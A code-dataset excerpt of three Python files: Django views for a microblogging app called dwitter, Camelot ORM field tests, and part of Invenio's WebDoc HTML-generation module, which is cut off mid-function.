code | repo_name | path | language | license | size
---|---|---|---|---|---
# -*- coding: utf-8 -*-
import re
from django.shortcuts import render_to_response, get_object_or_404
from django.http import HttpResponse
from django.template.loader import render_to_string
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import ensure_csrf_cookie
from django.conf import settings
from django.utils.html import escape
from django.utils.translation import ugettext as _
from django.utils.translation import get_language
from dwitter.main.models import Member, Dwit, DPF
from dwitter.main.tasks import celery_dwitsaved, celery_follow, celery_unfollow
from dwitter.main.forms import MemberForm, SearchForm
from django.utils import translation
@login_required
@ensure_csrf_cookie
def home(request):
if not request.session.get('django_language', None):
request.session['django_language'] = get_language()
me = request.user.member
following = me.following.all().count()
followers = me.followers.all().count()
nodwits = Dwit.objects.filter(member=me).count()
context_vars={'me':me,'following':following,'followers':followers,'nodwits':nodwits,'navbar':'home'}
if request.GET.get('tag'):
context_vars.update({'tag':request.GET['tag']})
template_name='home.html'
context = RequestContext(request)
return render_to_response(template_name,context_vars,context_instance=context)
@login_required
def getflow(request, nfd):
nod = settings.NUMBER_OF_DWITS
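    # NUMBER_OF_DWITS (nod) is the page size; 'nfd' appears to be the offset of
    # dwits already shown, so each call returns the next page via the slices below.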
context_vars = {}
if request.GET.get('tag'):
dwits = Dwit.objects.filter(tags__name=request.GET.get('tag'))[int(nfd):int(nfd)+int(nod)]
elif request.GET.get('username'):
me = get_object_or_404(Member, user__username=request.GET['username'])
dwits = Dwit.objects.filter(member = me)[int(nfd):int(nfd)+int(nod)]
context_vars.update({'profile':True})
elif request.GET.get('hash'):
form = SearchForm(request.GET)
if form.is_valid():
if form.cleaned_data.get('hash'):
hashes = form.cleaned_data['hash']
hashes = hashes.replace(',','')
hashes_array = hashes.split()
dwits = Dwit.objects.filter(tags__name__in=hashes_array).distinct()[int(nfd):int(nfd)+int(nod)]
context_vars.update({'search':True})
else:
me = request.user.member
dwitspf = DPF.objects.filter(member = me)[int(nfd):int(nfd)+int(nod)]
dwits=[]
for dwitpf in dwitspf:
dwits.append(dwitpf.dwit)
for dwit in dwits:
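        # Linkify hashtags: every ' #word' in the dwit body becomes a link to
        # /main/home/?tag=word; the trailing replace('#<', '<') strips the
        # original '#' left in front of the inserted anchor.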
dwit.content = re.subn('(?P<tag>(?<= #)\w+)','<a href="/main/home/?tag=\g<tag>" class="label label-info vmiddle" rel="nofollow" title="\g<tag>">#\g<tag></a>',dwit.content)[0].replace("#<","<")
template_name='flow.html'
context_vars.update({'dwits':dwits})
if len(dwits) == nod:
context_vars.update({'nfd':int(nfd)+nod})
context = RequestContext(request)
return render_to_response(template_name,context_vars,context_instance=context)
@login_required
def gettags(request):
notags = settings.NUMBER_OF_TAGS
tags = Dwit.tags.most_common()[0:notags]
context_vars={'tags':tags}
template_name='tags.html'
context = RequestContext(request)
return render_to_response(template_name,context_vars,context_instance=context)
@login_required
def dwit(request):
if request.method != 'POST':
response = HttpResponse(mimetype="text/html")
response['content-type']="text/html; charset=UTF-8"
        response.write(u"POST only!")
return response
me = request.user.member
if request.POST.get('dwit'):
content = escape(request.POST['dwit'])
direct = False
if re.match('^\@\w+',content):
try:
Member.objects.get(user__username=re.match('^\@\w+',content).group(0)[1:])
direct = True
except Member.DoesNotExist:
response = HttpResponse(mimetype="application/json")
                response.write(u'{"status":"error","message":"'+_('No such user.')+'"}')
return response
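        # Hashtags are captured with their leading space (' #tag'); tag[2:] below
        # strips the ' #' prefix before the bare tag name is stored.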
tags = re.findall(r' #\w+',content)
try:
replyto = Dwit.objects.get(pk = request.POST.get('dwitid',None))
except Dwit.DoesNotExist:
replyto = None
dwit = Dwit.objects.create(member = me, content = content, replyto = replyto, direct=direct)
for tag in tags:
dwit.tags.add(tag[2:])
rendered = render_to_string('flow.html',{'dwits':[dwit]})
celery_dwitsaved.delay(dwit, rendered)
elif request.POST.get('dwitid'):
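        # Re-dwit branch: republish an existing dwit under the current member,
        # crediting the original author via the 'redwit' field.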
dwit = get_object_or_404(Dwit, pk=request.POST['dwitid'])
newdwit = Dwit.objects.create(member = me, content = dwit.content, redwit = dwit.member)
if dwit.tags:
tags = dwit.tags.all()
newdwit.tags.add(*tags)
rendered = render_to_string('flow.html',{'dwits':[newdwit]})
celery_dwitsaved.delay(newdwit, rendered)
response = HttpResponse(mimetype="application/json")
response.write('{"status":"success","message":"'+_('Dwit published.')+'"}')
return response
@login_required
@ensure_csrf_cookie
def profile(request,username):
m = get_object_or_404(Member, user__username=username)
nodwits = Dwit.objects.filter(member=m).count()
fing = m.following.all()
following = len(fing)
if request.user.username != username:
me = request.user.member
me_fing = me.following.all()
if m in me_fing:
action = 'unfollow'
else:
action = 'follow'
else:
action = None
fers = m.followers.all()
followers = len(fers)
context_vars={'m':m,'fing':fing,'fers':fers,'action':action,'nodwits':nodwits,'following':following,'followers':followers,'navbar':'profile'}
if not action:
if request.method == 'POST':
form = MemberForm(request.POST, request.FILES, instance=m)
if form.is_valid():
if request.LANGUAGE_CODE != form.cleaned_data['language']:
request.session['django_language'] = form.cleaned_data['language']
translation.activate(form.cleaned_data['language'])
form.save()
context_vars.update({'success':_('Changes saved'),'form':form,'current_lang':m.language})
else:
ferrors = ''
for field in form:
if field.errors:
ferrors += '<b>'+field.label+'</b>: '
for error in field.errors:
ferrors += error+'<br />'
context_vars.update({'ferrors':ferrors,'form':form,'current_lang':m.language})
else:
form = MemberForm(instance=m)
context_vars.update({'form':form,'current_lang':m.language})
template_name='profile.html'
context = RequestContext(request)
return render_to_response(template_name,context_vars,context_instance=context)
@login_required
def follow(request, username):
m = get_object_or_404(Member, user__username=username)
me = request.user.member
me.following.add(m)
celery_follow.delay(me, m)
response = HttpResponse(mimetype="text/html")
response['content-type']="text/html; charset=UTF-8"
response.write(_('You follow %s') % username)
return response
@login_required
def unfollow(request, username):
m = get_object_or_404(Member, user__username=username)
me = request.user.member
me.following.remove(m)
celery_unfollow.delay(me,m)
response = HttpResponse(mimetype="text/html")
response['content-type']="text/html; charset=UTF-8"
response.write(_('You stopped following %s') % username)
return response
@login_required
def search(request):
form = SearchForm()
context_vars={'form':form,'navbar':'search'}
template_name='search.html'
context = RequestContext(request)
return render_to_response(template_name,context_vars,context_instance=context)
@login_required
def getdwit(request,dwit):
d = get_object_or_404(Dwit, pk=dwit)
template_name='redwit.html'
context = RequestContext(request)
return render_to_response(template_name,{'dwit':d},context_instance=context)
@login_required
def getreplyto(request,dwit):
d = get_object_or_404(Dwit, pk=dwit)
template_name='replyto.html'
context = RequestContext(request)
return render_to_response(template_name,{'dwit':d},context_instance=context)
| sv1jsb/dwitter | dwitter/main/views.py | Python | bsd-3-clause | 8,546 |
"""
test the different syntaxes to define fields
"""
from . import TestMetaData
from camelot.core.orm import Field, has_field
from sqlalchemy.types import String
class TestFields( TestMetaData ):
def test_attr_syntax(self):
class Person(self.Entity):
firstname = Field(String(30))
surname = Field(String(30))
self.create_all()
self.session.begin()
Person(firstname="Homer", surname="Simpson")
Person(firstname="Bart", surname="Simpson")
self.session.commit()
self.session.expunge_all()
p = Person.get_by(firstname="Homer")
assert p.surname == 'Simpson'
def test_has_field(self):
class Person(self.Entity):
has_field('firstname', String(30))
has_field('surname', String(30))
self.create_all()
self.session.begin()
Person(firstname="Homer", surname="Simpson")
Person(firstname="Bart", surname="Simpson")
self.session.commit()
self.session.expunge_all()
p = Person.get_by(firstname="Homer")
assert p.surname == 'Simpson'
| jeroendierckx/Camelot | test/test_orm/test_fields.py | Python | gpl-2.0 | 1,169 |
# -*- coding: utf-8 -*-
## This file is part of Invenio.
## Copyright (C) 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
WebDoc -- Transform webdoc sources into static html files
"""
__revision__ = \
"$Id$"
from invenio.config import \
CFG_PREFIX, \
CFG_SITE_LANG, \
CFG_SITE_LANGS, \
CFG_SITE_NAME, \
CFG_SITE_SUPPORT_EMAIL, \
CFG_SITE_ADMIN_EMAIL, \
CFG_SITE_URL, \
CFG_SITE_SECURE_URL, \
CFG_VERSION, \
CFG_SITE_NAME_INTL, \
CFG_CACHEDIR
from invenio.dateutils import \
convert_datestruct_to_datetext, \
convert_datestruct_to_dategui, \
convert_datecvs_to_datestruct
from invenio.messages import \
gettext_set_language, \
wash_language, \
language_list_long
import re
import getopt
import os
import sys
import time
# List of (webdoc_source_dir, webdoc_cache_dir)
webdoc_dirs = {'help':('%s/lib/webdoc/invenio/help' % CFG_PREFIX, \
'%s/webdoc/help-pages' % CFG_CACHEDIR),
'admin':('%s/lib/webdoc/invenio/admin' % CFG_PREFIX, \
'%s/webdoc/admin-pages' % CFG_CACHEDIR),
'hacking':('%s/lib/webdoc/invenio/hacking' % CFG_PREFIX, \
'%s/webdoc/hacking-pages' % CFG_CACHEDIR)}
# Regular expression for finding text to be translated
translation_pattern = re.compile(r'_\((?P<word>.*?)\)_', \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding comments
comments_pattern = re.compile(r'^\s*#.*$', \
re.MULTILINE)
# Regular expression for finding <lang:current/> tag
pattern_lang_current = re.compile(r'<lang \s*:\s*current\s*\s*/>', \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <lang:link/> tag
pattern_lang_link_current = re.compile(r'<lang \s*:\s*link\s*\s*/>', \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <!-- %s: %s --> tag
# where %s will be replaced at run time
pattern_tag = r'''
<!--\s*(?P<tag>%s) #<!-- %%s tag (no matter case)
\s*:\s*
(?P<value>.*?) #description value. any char that is not end tag
(\s*-->) #end tag
'''
# List of available tags in webdoc, and the pattern to find it
pattern_tags = {'WebDoc-Page-Title': '',
'WebDoc-Page-Navtrail': '',
'WebDoc-Page-Description': '',
'WebDoc-Page-Keywords': '',
'WebDoc-Page-Header-Add': '',
'WebDoc-Page-Box-Left-Top-Add': '',
'WebDoc-Page-Box-Left-Bottom-Add': '',
'WebDoc-Page-Box-Right-Top-Add': '',
'WebDoc-Page-Box-Right-Bottom-Add': '',
'WebDoc-Page-Footer-Add': '',
'WebDoc-Page-Revision': ''
}
for tag in pattern_tags.keys():
pattern_tags[tag] = re.compile(pattern_tag % tag, \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <lang>...</lang> tag
pattern_lang = re.compile(r'''
<lang #<lang tag (no matter case)
\s*
(?P<keep>keep=all)*
\s* #any number of white spaces
> #closing <lang> start tag
(?P<langs>.*?) #anything but the next group (greedy)
(</lang\s*>) #end tag
''', re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <en>...</en> tag (particular case of
# pattern_lang)
pattern_CFG_SITE_LANG = re.compile(r"<("+CFG_SITE_LANG+ \
r")\s*>(.*?)(</"+CFG_SITE_LANG+r"\s*>)",
re.IGNORECASE | re.DOTALL)
# Builds regular expression for finding each known language in <lang> tags
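# For illustration (assuming only 'en' and 'fr' are known languages), the pattern
# built below is roughly: <(?P<lang>en|fr)\s*(revision="[^"]"\s*)?>(?P<translation>.*?)</\1>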
ln_pattern_text = r"<(?P<lang>"
ln_pattern_text += r"|".join([lang[0] for lang in \
language_list_long(enabled_langs_only=False)])
ln_pattern_text += r')\s*(revision="[^"]"\s*)?>(?P<translation>.*?)</\1>'
ln_pattern = re.compile(ln_pattern_text, re.IGNORECASE | re.DOTALL)
defined_tags = {'<CFG_SITE_NAME>': CFG_SITE_NAME,
'<CFG_SITE_SUPPORT_EMAIL>': CFG_SITE_SUPPORT_EMAIL,
'<CFG_SITE_ADMIN_EMAIL>': CFG_SITE_ADMIN_EMAIL,
'<CFG_SITE_URL>': CFG_SITE_URL,
'<CFG_SITE_SECURE_URL>': CFG_SITE_SECURE_URL,
'<CFG_VERSION>': CFG_VERSION,
'<CFG_SITE_NAME_INTL>': CFG_SITE_NAME_INTL}
def get_webdoc_parts(webdoc,
parts=['title', \
'keywords', \
'navtrail', \
'body',
'lastupdated',
'description'],
categ="",
update_cache_mode=1,
ln=CFG_SITE_LANG,
verbose=0):
"""
    Returns the html of the specified 'webdoc' part(s).
    Also updates the cache according to 'update_cache_mode'.
Parameters:
webdoc - *string* the name of a webdoc that can be
found in standard webdoc dir, or a webdoc
filepath. Priority is given to filepath if
both match.
parts - *list(string)* the parts that should be
returned by this function. Can be in:
'title', 'keywords', 'navtrail', 'body',
'description', 'lastupdated'.
categ - *string* (optional) The category to which
the webdoc file belongs. 'help', 'admin'
or 'hacking'. If "", look in all categories.
update_cache_mode - *int* update the cached version of the
given 'webdoc':
- 0 : do not update
- 1 : update if needed
- 2 : always update
Returns : *dictionary* with keys being in 'parts' input parameter and values
being the corresponding html part.
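    Example (sketch; 'search-guide' is the sample page name used in this
    module's command-line help):
        get_webdoc_parts('search-guide', parts=['title', 'body'], ln='fr')
    returns a dictionary with 'title' and 'body' keys for that page.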
"""
html_parts = {}
if update_cache_mode in [1, 2]:
update_webdoc_cache(webdoc, update_cache_mode, verbose)
def get_webdoc_cached_part_path(webdoc_cache_dir, webdoc, ln, part):
"Build path for given webdoc, ln and part"
return webdoc_cache_dir + os.sep + webdoc + \
os.sep + webdoc + '.' + part + '-' + \
ln + '.html'
for part in parts:
if categ != "":
locations = [webdoc_dirs.get(categ, ('',''))]
else:
locations = webdoc_dirs.values()
for (_webdoc_source_dir, _web_doc_cache_dir) in locations:
webdoc_cached_part_path = None
if os.path.exists(get_webdoc_cached_part_path(_web_doc_cache_dir,
webdoc, ln, part)):
# Check given language
webdoc_cached_part_path = get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, ln, part)
elif os.path.exists(get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, CFG_SITE_LANG, part)):
# Check CFG_SITE_LANG
webdoc_cached_part_path = get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, CFG_SITE_LANG, part)
elif os.path.exists(get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, 'en', part)):
# Check English
webdoc_cached_part_path = get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, 'en', part)
if webdoc_cached_part_path is not None:
try:
webdoc_cached_part = file(webdoc_cached_part_path, 'r').read()
html_parts[part] = webdoc_cached_part
except IOError:
# Could not read cache file. Generate on-the-fly,
# get all the parts at the same time, and return
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
webdoc_source = file(webdoc_source_path, 'r').read()
htmls = transform(webdoc_source, languages=[ln])
if len(htmls) > 0:
(lang, body, title, keywords, \
navtrail, lastupdated, description) = htmls[-1]
html_parts = {'body': body or '',
'title': title or '',
'keywords': keywords or '',
'navtrail': navtrail or '',
'lastupdated': lastupdated or '',
'description': description or ''}
# We then have all the parts, or there is no
# translation for this file (if len(htmls)==0)
break
else:
# Look in other categories
continue
if html_parts == {}:
# Could not find/read the folder where cache should
# be. Generate on-the-fly, get all the parts at the
# same time, and return
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
if webdoc_source_path is not None:
try:
webdoc_source = file(webdoc_source_path, 'r').read()
htmls = transform(webdoc_source, languages=[ln])
if len(htmls) > 0:
(lang, body, title, keywords, \
navtrail, lastupdated, description) = htmls[-1]
html_parts = {'body': body or '',
'title': title or '',
'keywords': keywords or '',
'navtrail': navtrail or '',
'lastupdated': lastupdated or '',
'description': description or ''}
# We then have all the parts, or there is no
# translation for this file (if len(htmls)==0)
break
except IOError:
# Nothing we can do..
pass
return html_parts
def update_webdoc_cache(webdoc, mode=1, verbose=0, languages=CFG_SITE_LANGS):
"""
Update the cache (on disk) of the given webdoc.
Parameters:
webdoc - *string* the name of a webdoc that can be
found in standard webdoc dir, or a webdoc
filepath.
mode - *int* update cache mode:
- 0 : do not update
- 1 : only if necessary (webdoc source
is newer than its cache)
- 2 : always update
"""
if mode in [1, 2]:
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
if mode == 1 and \
webdoc_source_modification_date < webdoc_cache_modification_date and \
get_mo_last_modification() < webdoc_cache_modification_date:
# Cache was updated after source. No need to update
return
(webdoc_source, \
webdoc_cache_dir, \
webdoc_name) = read_webdoc_source(webdoc)
if webdoc_source is not None:
htmls = transform(webdoc_source, languages=languages)
for (lang, body, title, keywords, \
navtrail, lastupdated, description) in htmls:
# Body
if body is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.body%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
body,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Title
if title is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.title%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
title,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Keywords
if keywords is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.keywords%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
keywords,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Navtrail
if navtrail is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.navtrail%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
navtrail,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Description
if description is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.description%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
description,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Last updated timestamp (CVS timestamp)
if lastupdated is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.lastupdated%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
lastupdated,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Last updated cache file
try:
write_cache_file('last_updated',
webdoc_cache_dir,
convert_datestruct_to_dategui(time.localtime()),
verbose=0)
except IOError, e:
print e
except OSError, e:
print e
if verbose > 0:
print 'Written cache in %s' % webdoc_cache_dir
def read_webdoc_source(webdoc):
"""
Returns the source of the given webdoc, along with the path to its
cache directory.
Returns (None, None, None) if webdoc cannot be found.
Parameters:
webdoc - *string* the name of a webdoc that can be
found in standard webdoc dir, or a webdoc
filepath. Priority is given to filepath if
both match.
Returns: *tuple* (webdoc_source, webdoc_cache_dir, webdoc_name)
"""
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
if webdoc_source_path is not None:
try:
webdoc_source = file(webdoc_source_path, 'r').read()
except IOError:
webdoc_source = None
else:
webdoc_source = None
return (webdoc_source, webdoc_cache_dir, webdoc_name)
def get_webdoc_info(webdoc):
"""
Locate the file corresponding to given webdoc and return its
path, the path to its cache directory (even if it does not exist
yet), the last modification dates of the source and the cache, and
the webdoc name (i.e. webdoc id)
Parameters:
webdoc - *string* the name of a webdoc that can be found in
standard webdoc dirs. (Without extension '.webdoc',
hence 'search-guide', not'search-guide.webdoc'.)
Returns: *tuple* (webdoc_source_path, webdoc_cache_dir,
webdoc_name webdoc_source_modification_date,
webdoc_cache_modification_date)
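    For example, a 'help' page named 'search-guide' would typically resolve to
    <CFG_PREFIX>/lib/webdoc/invenio/help/search-guide.webdoc, with its cache kept
    under <CFG_CACHEDIR>/webdoc/help-pages/search-guide (see webdoc_dirs above).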
"""
webdoc_source_path = None
webdoc_cache_dir = None
webdoc_name = None
last_updated_date = None
webdoc_source_modification_date = 1
webdoc_cache_modification_date = 0
for (_webdoc_source_dir, _web_doc_cache_dir) in webdoc_dirs.values():
webdoc_source_path = _webdoc_source_dir + os.sep + \
webdoc + '.webdoc'
if os.path.exists(webdoc_source_path):
webdoc_cache_dir = _web_doc_cache_dir + os.sep + webdoc
webdoc_name = webdoc
webdoc_source_modification_date = os.stat(webdoc_source_path).st_mtime
break
else:
webdoc_source_path = None
webdoc_name = None
webdoc_source_modification_date = 1
if webdoc_cache_dir is not None and \
os.path.exists(webdoc_cache_dir + os.sep + 'last_updated'):
webdoc_cache_modification_date = os.stat(webdoc_cache_dir + \
os.sep + \
'last_updated').st_mtime
return (webdoc_source_path, webdoc_cache_dir, webdoc_name,
webdoc_source_modification_date, webdoc_cache_modification_date)
def get_webdoc_topics(sort_by='name', sc=0, limit=-1,
categ=['help', 'admin', 'hacking'],
ln=CFG_SITE_LANG):
"""
List the available webdoc files in html format.
sort_by - *string* Sort topics by 'name' or 'date'.
sc - *int* Split the topics by categories if sc=1.
limit - *int* Max number of topics to be printed.
No limit if limit < 0.
categ - *list(string)* the categories to consider
ln - *string* Language of the page
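    Example (sketch): get_webdoc_topics(sort_by='date', sc=1, limit=5, ln='en')
    returns an HTML string listing, per category, the five most recently
    updated pages.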
"""
_ = gettext_set_language(ln)
topics = {}
ln_link = (ln != CFG_SITE_LANG and '?ln=' + ln) or ''
for category in categ:
if not webdoc_dirs.has_key(category):
continue
(source_path, cache_path) = webdoc_dirs[category]
if not topics.has_key(category):
topics[category] = []
# Build list of tuples(webdoc_name, webdoc_date, webdoc_url)
for webdocfile in [path for path in \
os.listdir(source_path) \
if path.endswith('.webdoc')]:
webdoc_name = webdocfile[:-7]
webdoc_url = CFG_SITE_URL + "/help/" + \
((category != 'help' and category + '/') or '') + \
webdoc_name
try:
webdoc_date = time.strptime(get_webdoc_parts(webdoc_name,
parts=['lastupdated']).get('lastupdated', "1970-01-01 00:00:00"),
"%Y-%m-%d %H:%M:%S")
except:
webdoc_date = time.strptime("1970-01-01 00:00:00", "%Y-%m-%d %H:%M:%S")
topics[category].append((webdoc_name, webdoc_date, webdoc_url))
# If not split by category, merge everything
if sc == 0:
all_topics = []
for topic in topics.values():
all_topics.extend(topic)
topics.clear()
topics[''] = all_topics
# Sort topics
if sort_by == 'name':
for topic in topics.values():
topic.sort()
elif sort_by == 'date':
for topic in topics.values():
topic.sort(lambda x, y:cmp(x[1], y[1]))
topic.reverse()
out = ''
for category, topic in topics.iteritems():
if category != '' and len(categ) > 1:
out += '<strong>'+ _("%(category)s Pages") % \
{'category': _(category).capitalize()} + '</strong>'
if limit < 0:
limit = len(topic)
out += '<ul><li>' + \
'</li><li>'.join(['%s <a href="%s%s">%s</a>' % \
((sort_by == 'date' and time.strftime('%Y-%m-%d', topic_item[1])) or '', \
topic_item[2], \
ln_link, \
get_webdoc_parts(topic_item[0], \
parts=['title'], \
ln=ln).get('title', '')) \
for topic_item in topic[:limit]]) + \
'</li></ul>'
return out
def transform(webdoc_source, verbose=0, req=None, languages=CFG_SITE_LANGS):
"""
Transform a WebDoc into html
    This is made through a series of transformations, mainly substitutions.
Parameters:
- webdoc_source : *string* the WebDoc input to transform to HTML
"""
parameters = {} # Will store values for specified parameters, such
# as 'Title' for <!-- WebDoc-Page-Title: Title -->
def get_param_and_remove(match):
"""
        Analyses 'match', gets the parameter and returns an empty string to
        remove it.
        Called by substitution in 'transform(...)', used to collect
parameters such as <!-- WebDoc-Page-Title: Title -->
@param match: a match object corresponding to the special tag
that must be interpreted
"""
tag = match.group("tag")
value = match.group("value")
parameters[tag] = value
return ''
def translate(match):
"""
Translate matching values
"""
word = match.group("word")
translated_word = _(word)
return translated_word
# 1 step
## First filter, used to remove comments
## and <protect> tags
uncommented_webdoc = ''
for line in webdoc_source.splitlines(True):
if not line.strip().startswith('#'):
uncommented_webdoc += line
webdoc_source = uncommented_webdoc.replace('<protect>', '')
webdoc_source = webdoc_source.replace('</protect>', '')
html_texts = {}
# Language dependent filters
for ln in languages:
_ = gettext_set_language(ln)
# Check if translation is really needed
## Just a quick check. Might trigger false negative, but it is
## ok.
if ln != CFG_SITE_LANG and \
translation_pattern.search(webdoc_source) is None and \
pattern_lang_link_current.search(webdoc_source) is None and \
pattern_lang_current.search(webdoc_source) is None and \
'<%s>' % ln not in webdoc_source and \
('_(') not in webdoc_source:
continue
# 2 step
## Filter used to translate string in _(..)_
localized_webdoc = translation_pattern.sub(translate, webdoc_source)
# 3 step
## Print current language 'en', 'fr', .. instead of
## <lang:current /> tags and '?ln=en', '?ln=fr', .. instead of
## <lang:link /> if ln is not default language
if ln != CFG_SITE_LANG:
localized_webdoc = pattern_lang_link_current.sub('?ln=' + ln,
localized_webdoc)
else:
localized_webdoc = pattern_lang_link_current.sub('',
localized_webdoc)
localized_webdoc = pattern_lang_current.sub(ln, localized_webdoc)
# 4 step
## Filter out languages
localized_webdoc = filter_languages(localized_webdoc, ln, defined_tags)
# 5 Step
## Replace defined tags with their value from config file
## Eg. replace <CFG_SITE_URL> with 'http://cdsweb.cern.ch/':
for defined_tag, value in defined_tags.iteritems():
if defined_tag.upper() == '<CFG_SITE_NAME_INTL>':
localized_webdoc = localized_webdoc.replace(defined_tag, \
value.get(ln, value['en']))
else:
localized_webdoc = localized_webdoc.replace(defined_tag, value)
# 6 step
## Get the parameters defined in HTML comments, like
## <!-- WebDoc-Page-Title: My Title -->
localized_body = localized_webdoc
for tag, pattern in pattern_tags.iteritems():
localized_body = pattern.sub(get_param_and_remove, localized_body)
out = localized_body
# Pre-process date
last_updated = parameters.get('WebDoc-Page-Revision', '')
last_updated = convert_datecvs_to_datestruct(last_updated)
last_updated = convert_datestruct_to_datetext(last_updated)
html_texts[ln] = (ln,
out,
parameters.get('WebDoc-Page-Title'),
parameters.get('WebDoc-Page-Keywords'),
parameters.get('WebDoc-Page-Navtrail'),
last_updated,
parameters.get('WebDoc-Page-Description'))
# Remove duplicates
filtered_html_texts = []
if html_texts.has_key(CFG_SITE_LANG):
filtered_html_texts = [(html_text[0], \
(html_text[1] != html_texts[CFG_SITE_LANG][1] and html_text[1]) or None, \
(html_text[2] != html_texts[CFG_SITE_LANG][2] and html_text[2]) or None, \
(html_text[3] != html_texts[CFG_SITE_LANG][3] and html_text[3]) or None, \
(html_text[4] != html_texts[CFG_SITE_LANG][4] and html_text[4]) or None, \
(html_text[5] != html_texts[CFG_SITE_LANG][5] and html_text[5]) or None, \
(html_text[6] != html_texts[CFG_SITE_LANG][6] and html_text[6]) or None)
for html_text in html_texts.values() \
if html_text[0] != CFG_SITE_LANG]
filtered_html_texts.append(html_texts[CFG_SITE_LANG])
else:
filtered_html_texts = html_texts.values()
return filtered_html_texts
def mymkdir(newdir, mode=0777):
"""works the way a good mkdir should :)
- already exists, silently complete
- regular file in the way, raise an exception
- parent directory(ies) does not exist, make them as well
"""
if os.path.isdir(newdir):
pass
elif os.path.isfile(newdir):
raise OSError("a file with the same name as the desired " \
"dir, '%s', already exists." % newdir)
else:
head, tail = os.path.split(newdir)
if head and not os.path.isdir(head):
mymkdir(head, mode)
if tail:
os.umask(022)
os.mkdir(newdir, mode)
def write_cache_file(filename, webdoc_cache_dir, filebody, verbose=0):
"""Write a file inside WebDoc cache dir.
Raise an exception if not possible
"""
# open file:
mymkdir(webdoc_cache_dir)
fullfilename = webdoc_cache_dir + os.sep + filename
if filebody is None:
filebody = ''
os.umask(022)
f = open(fullfilename, "w")
f.write(filebody)
f.close()
if verbose > 2:
print 'Written %s' % fullfilename
def get_mo_last_modification():
"""
Returns the timestamp of the most recently modified mo (compiled
po) file
"""
# Take one of the mo files. They are all installed at the same
# time, so last modication date should be the same
mo_file = '%s/share/locale/%s/LC_MESSAGES/invenio.mo' % (CFG_PREFIX, CFG_SITE_LANG)
if os.path.exists(os.path.abspath(mo_file)):
return os.stat(mo_file).st_mtime
else:
return 0
def filter_languages(text, ln='en', defined_tags=None):
"""
Filters the language tags that do not correspond to the specified language.
Eg: <lang><en>A book</en><de>Ein Buch</de></lang> will return
- with ln = 'de': "Ein Buch"
- with ln = 'en': "A book"
- with ln = 'fr': "A book"
Also replace variables such as <CFG_SITE_URL> and <CFG_SITE_NAME_INTL> inside
<lang><..><..></lang> tags in order to print them with the correct
language
@param text: the input text
@param ln: the language that is NOT filtered out from the input
@return: the input text as string with unnecessary languages filtered out
@see: bibformat_engine.py, from where this function was originally extracted
"""
# First define search_lang_tag(match) and clean_language_tag(match), used
# in re.sub() function
def search_lang_tag(match):
"""
Searches for the <lang>...</lang> tag and remove inner localized tags
such as <en>, <fr>, that are not current_lang.
If current_lang cannot be found inside <lang> ... </lang>, try to use 'CFG_SITE_LANG'
@param match: a match object corresponding to the special tag that must be interpreted
"""
current_lang = ln
        # If <lang keep=all> is used, keep all languages and empty lines (this is
# currently undocumented and behaviour might change)
keep = False
if match.group("keep") is not None:
keep = True
def clean_language_tag(match):
"""
Return tag text content if tag language of match is output language.
Called by substitution in 'filter_languages(...)'
@param match: a match object corresponding to the special tag that must be interpreted
"""
if match.group('lang') == current_lang or \
keep == True:
return match.group('translation')
else:
return ""
# End of clean_language_tag(..)
lang_tag_content = match.group("langs")
        # Try to find tag with current lang. If it does not exist,
# then try to look for CFG_SITE_LANG. If still does not exist, use
# 'en' as current_lang
pattern_current_lang = re.compile(r"<(" + current_lang + \
r")\s*>(.*?)(</"+current_lang+r"\s*>)",
re.IGNORECASE | re.DOTALL)
if re.search(pattern_current_lang, lang_tag_content) is None:
current_lang = CFG_SITE_LANG
